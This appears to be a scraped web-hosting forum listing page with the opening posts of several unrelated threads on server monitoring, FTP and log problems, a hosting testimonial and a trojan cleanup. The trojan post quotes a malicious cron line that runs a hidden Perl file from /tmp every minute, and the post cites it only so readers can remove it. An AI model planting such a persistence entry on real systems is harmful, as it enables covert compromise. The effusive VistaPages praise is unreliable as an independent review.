root 15135 0.0 1.2 90504 12360 ? Sl Aug05 0:11 python2 MatrixSALaunch.py ThreadedAppServer
apache 19934 0.0 0.3 6096 3864 ? S Aug05 0:00 /usr/local/apache/bin/httpd -DSSL
1001 8664 0.0 0.1 2524 1044 ? S 10:00 0:00 /usr/libexec/gam_server
1003 8666 0.0 0.1 2528 1040 ? S 10:00 0:00 /usr/libexec/gam_server
root 17068 0.0 2.6 31508 27016 ? Ss 16:16 0:00 /usr/bin/spamd -d -c -m5 -H -r /var/run/spamd.pid
root 17070 0.1 2.8 33752 29236 ? S 16:17 0:01 \_ spamd child
root 17071 0.0 2.7 32432 27772 ? S 16:17 0:00 \_ spamd child
vmstat 5 5:
Quote:
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
0 1 86800 26008 285380 234780 0 0 3 10 21 1 0 0 99 0 0
0 0 86800 26716 285396 234792 0 0 0 98 289 538 4 1 94 0 0
0 0 86800 26764 285404 234792 0 0 0 62 254 333 0 0 100 0 0
0 0 86800 26772 285404 234792 0 0 0 0 255 346 0 0 100 0 0
0 0 86800 26772 285416 234792 0 0 0 16 253 408 0 0 100 0 0
View 3 Replies
View Related
Nov 12, 2008
On Cpanel/WHM. I have just moved from a VPS to a dedicated server. I reinstalled munin, so get some stats via that. I used to have apachetop loaded on my VPS for when I wanted a 'near realtime' streaming view of apache access.
I'm wondering what the best solution is to get a good view of apache, like what apachetop did, plus also it would be nice to have a real-time monitor of MySQL activity, HDD activity (such as I/O queues, etc. Something along the lines of the perfmon on Windows servers.
What is my best option?
Also, with Nagios, when I look at the website, it seems there are two options. Load it on a single server and then load the stats via [url]or have the Nagios 'stat collector' on one machine, and have it gathering stats from multiple machines.
If you only install it on a single dedicated server, do you really have to be on the console and connect to the Nagios stats via localhost, rather than connecting remotely?
Ideally, I would like a quick, easy to setup solution, but if it takes some configuring, I can deal with it, as long as there is some documentation. My main goal is to get the real time type monitoring, you get with window's perfmon.
View 11 Replies
View Related
Apr 2, 2008
I wanted to share a little about my experience with VistaPages Web Hosting. I have a wonderful experience with them as a client, I started a new website last year and searched for a server host for the site and I came accross VistaPages and I am so happy I did. Their service is by far the best I have experienced so far, they really care about their customers, very professional. I ran into a little problem with the script I purchased from another Company for the website, they wanted to charge me again for a reinstall and I didn't really want to do that, so I contacted VistaPages about the problem I had with the website's script and told them that they wanted to charge me again, to my surprise VistaPages went out of their way and reinstalled the script for me at no cost, I couldn't believe they would do that for me but they did, they really care about their customers. The support staff always respond quickly and take care of any problems that arise. They are very courteous, professional, and most importantly very caring to your needs and concerns. One of the most important features of a web hosting company is their knowledge, VistaPages is the best that is out there, they really know all the aspects that is required of a web hosting company. I just started another website and I contacted them immediately to host the new site, with VistaPages hosting your websites you can;t help but have success! I would highly recommend them as a web hosting company for your websites.
View 14 Replies
View Related
Sep 5, 2007
Running programs named Perl with Heavy CPU usage, with the ownership of user apache.
We found the problem on Fedora 3 and Fedora 6.
In our case, it was the result of a Trojan activity.
Quick Solution
Check the cron jobs of user apache
crontab -u apache -e
*/1 * * * * perl /tmp/.tmp/tmpfile
delete the cronjob entry.
Also delete the file /tmp/.tmp/tmpfile
also added "apache" to the file /etc/cron.deny
That's all
Problem and solution in detail....
View 1 Replies
View Related
Jan 2, 2008
I couldn't keep my mouth shut (technically fingers). A customer wanted to upgrade servers and he needed a way to move the data across. Since I don't allow hard drives to be swapped, they have to do it manually all by themselves. I generally allow up-to 4 days for them to transfer data and make DNS changes, etc. But this time, I offered help! I agreed to move the data (darn me) and it just came out of me, involuntarily.
God knows what just happened... but in a positive way, customer is extremely happy!
So...
Both servers are on cPanel - with root access (duh)
200 odd files which total to 25 GB
1 database about 100 MB in size (no biggie)
I was planning on using one of my Windows 2003 servers (via remote desktop) to download the 25 GB and upload the 25 GB, but that sounds like a waste of resources and time.
View 8 Replies
View Related
Dec 21, 2008
i had a problem with one of my servers
due to changes in the firewall couldn't i login anymore.
Someone had to go over and undo that modification.
Now i am checking the log files like secure and
messages logs, but logs of the day he logged in are simply not
there (along with some days more).
View 3 Replies
View Related
Jul 20, 2008
When I upload a file in FTP I can not see the file, When I upload the file again asked me to file any replaced it exists, When using Cpanel can upload any file, And working well.
When watching the size of folders I find little in the FTP but sized Cpanel see him very different.
I have done this:
1-Restart FTP Server.
2-permit folders to 644.
3-permit files to 744.
View 2 Replies
View Related
Jun 3, 2007
Is there a way to see your os files in ftp software like cute ftp n edit them?
View 3 Replies
View Related
Mar 26, 2007
i received this message for my host
"The proxy sites hosted on your server are being used to send spam comments on blogs"
How can i view the log files in order to find that info and block the domains or IP?
I am on Centos.
View 2 Replies
View Related
Jan 28, 2007
In the last couple of days my server/website has been acting a little strange and I can't recall doing anything to it in this time.
1) Now and again a normal PHP page will pop-up in the Firefox download manager. Usually the page is simply compiled and shown to the browser.
2) Images that really are present on the server sometimes randomly don't show in IE.
PHP 5.1.4
MYSQL 5.0.27
Apache 1.3.37
APC 3.0.12p2 (latest)
View 3 Replies
View Related
Jul 26, 2006
I found that recently a lot of nobody files appear in my /tmp.
I delete and delete.. by still same. I don't know how to trace where they from. I suspect is from my hosting users, but I don't know how to check and trace. Anybody can give me some guide?
View 5 Replies
View Related
Jun 2, 2009
my site cannot run php files
move from server 1 to server 2
another site no ploblem move from server 1 to server 2 too
What ploblem i need fix this
here my site
[url]
View 5 Replies
View Related